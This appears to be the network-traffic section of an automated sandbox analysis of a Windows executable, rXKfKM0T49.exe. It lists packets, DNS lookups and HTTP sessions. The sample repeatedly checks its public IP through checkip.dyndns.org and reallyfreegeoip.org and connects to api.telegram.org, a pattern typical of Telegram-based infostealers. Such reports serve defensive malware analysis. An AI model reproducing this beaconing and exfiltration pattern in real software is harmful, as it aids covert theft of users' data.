                                                                                                          Jan 10, 2025 23:12:50.412293911 CET5003980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:50.416145086 CET8050037132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:50.416225910 CET5003780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:50.417082071 CET8050039132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:50.417150974 CET5003980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:50.417284012 CET5003980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:50.422014952 CET8050039132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:51.114533901 CET8050039132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:51.116153002 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:51.116209030 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:51.116302967 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:51.116642952 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:51.116653919 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:51.164844990 CET5003980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:51.748858929 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:51.750799894 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:51.750817060 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:51.750921965 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:51.750927925 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.085926056 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.086023092 CET44350040149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.086076975 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:52.086678982 CET50040443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:52.090204000 CET5003980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:52.091527939 CET5004180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:52.096781015 CET8050039132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.096851110 CET5003980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:52.097991943 CET8050041132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.098057985 CET5004180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:52.098161936 CET5004180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:52.102907896 CET8050041132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.793376923 CET8050041132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.794836044 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:52.794926882 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.795011997 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:52.795340061 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:52.795368910 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:52.836716890 CET5004180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:53.419691086 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.421681881 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:53.421715975 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.421998024 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:53.422008038 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.725212097 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.725281000 CET44350042149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.725409031 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:53.725974083 CET50042443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:53.729456902 CET5004180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:53.730715990 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:53.734409094 CET8050041132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.734488964 CET5004180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:53.735505104 CET8050043132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:53.735584021 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:53.735686064 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:53.740442038 CET8050043132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:54.435216904 CET8050043132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:54.436674118 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:54.436708927 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:54.436793089 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:54.437172890 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:54.437181950 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:54.477200031 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.061243057 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.062922001 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.062952995 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.062998056 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.063003063 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.278768063 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.278881073 CET44350044149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.278925896 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.279334068 CET50044443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.285514116 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.288007975 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.290591955 CET8050043132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.290663004 CET5004380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.292889118 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.292963982 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.293111086 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:55.297944069 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.965363026 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.966485023 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.966535091 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:55.966603994 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.966882944 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:55.966900110 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.008415937 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.592690945 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.594420910 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.594449997 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.595352888 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.595360041 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.980452061 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.980664968 CET44350046149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.980915070 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.981231928 CET50046443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:56.984549046 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.985822916 CET5004780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.989628077 CET8050045132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.989706039 CET5004580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.990609884 CET8050047132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:56.990678072 CET5004780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.990768909 CET5004780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:56.995518923 CET8050047132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:57.696752071 CET8050047132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:57.742858887 CET5004780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:13:00.704706907 CET50048443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:13:00.704771042 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:00.704937935 CET50048443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:13:00.705246925 CET50048443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:13:00.705270052 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:01.338464022 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:01.340259075 CET50048443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:13:01.340276003 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:01.340342999 CET50048443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:13:01.340351105 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:01.679380894 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:01.679464102 CET44350048149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:13:01.679619074 CET50048443192.168.2.9149.154.167.220

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 23:11:46.504569054 CET5464153192.168.2.91.1.1.1
                                                                                                          Jan 10, 2025 23:11:46.511576891 CET53546411.1.1.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:47.580527067 CET6217953192.168.2.91.1.1.1
                                                                                                          Jan 10, 2025 23:11:47.587179899 CET53621791.1.1.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:51.673094988 CET6200353192.168.2.91.1.1.1
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET53620031.1.1.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:53.078085899 CET5148353192.168.2.91.1.1.1
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET53514831.1.1.1192.168.2.9
                                                                                                          Jan 10, 2025 23:11:59.357623100 CET6019153192.168.2.91.1.1.1
                                                                                                          Jan 10, 2025 23:11:59.364669085 CET53601911.1.1.1192.168.2.9

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 23:11:46.504569054 CET192.168.2.91.1.1.10x1210Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:47.580527067 CET192.168.2.91.1.1.10x61d8Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.673094988 CET192.168.2.91.1.1.10xa6d2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.078085899 CET192.168.2.91.1.1.10x902bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:59.357623100 CET192.168.2.91.1.1.10x1d74Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 23:11:46.511576891 CET1.1.1.1192.168.2.90x1210No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:47.587179899 CET1.1.1.1192.168.2.90x61d8No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET1.1.1.1192.168.2.90xa6d2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET1.1.1.1192.168.2.90xa6d2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET1.1.1.1192.168.2.90xa6d2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET1.1.1.1192.168.2.90xa6d2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET1.1.1.1192.168.2.90xa6d2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:51.680149078 CET1.1.1.1192.168.2.90xa6d2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:53.086281061 CET1.1.1.1192.168.2.90x902bNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 23:11:59.364669085 CET1.1.1.1192.168.2.90x1d74No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.949975132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:11:51.689646006 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:11:52.399348974 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:11:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 23:11:52.404653072 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 23:11:52.623148918 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:11:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 23:11:59.138529062 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 23:11:59.353190899 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:11:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.949978132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:00.514538050 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 23:12:01.186801910 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:01 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.949980132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:02.053879976 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 23:12:02.727355957 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:02 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.949982132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:03.600290060 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:04.286410093 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:04 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.949984132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:05.274123907 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:05.984201908 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:05 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.949986132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:06.816690922 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:07.507061958 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:07 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.949988132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:08.403481007 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:09.103066921 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:08 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.949990132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:10.002064943 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:10.675221920 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
